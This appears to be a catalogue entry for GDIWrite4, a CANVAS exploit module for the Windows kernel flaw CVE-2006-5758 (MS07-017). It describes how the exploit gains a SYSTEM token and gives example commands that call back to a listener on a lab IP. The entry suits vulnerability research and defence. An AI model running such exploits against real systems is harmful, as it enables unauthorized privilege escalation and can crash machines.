| Name | GDIWrite4 |
| CVE | CVE-2006-5758 |
| Exploit Pack | CANVAS |
| Description | GDIWrite4 (MS07-017) |
| Notes | CVE Name: CVE-2006-5758 VENDOR: Microsoft Notes: This exploit will auto-target based on reading a kernel file on Windows 2000 or XP. It will generate a target fingerprint when you run the auto-targeter - this is useful when you don't have read access to the kernel files and still want to run the exploit. It will leave a SYSTEM token as your current token, if it succeeds #example commandline usage on Windows 2000 SP4 English #we set our callback IP to 10.10.10.6 in the test lab runmodule GDIWrite4 -l 10.10.10.6 -d 5555 Make sure you have a listener listening already before you run the above command. ./commandlineInterface -v 1 -p 5555 If you get the wrong version, (-v 1 on an XP box, say) you'll see a PAGE FAULT IN NON PAGED AREA bluescreen. On XP this was fixed with KB925902 MSRC: http://www.microsoft.com/technet/security/Bulletin/ms07-017.mspx MSADV: MS07-017 Date public: 11/06/2006 CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5758 CVSS: 7.2 |
| Learn more about the CANVAS Exploit Pack here: CANVAS |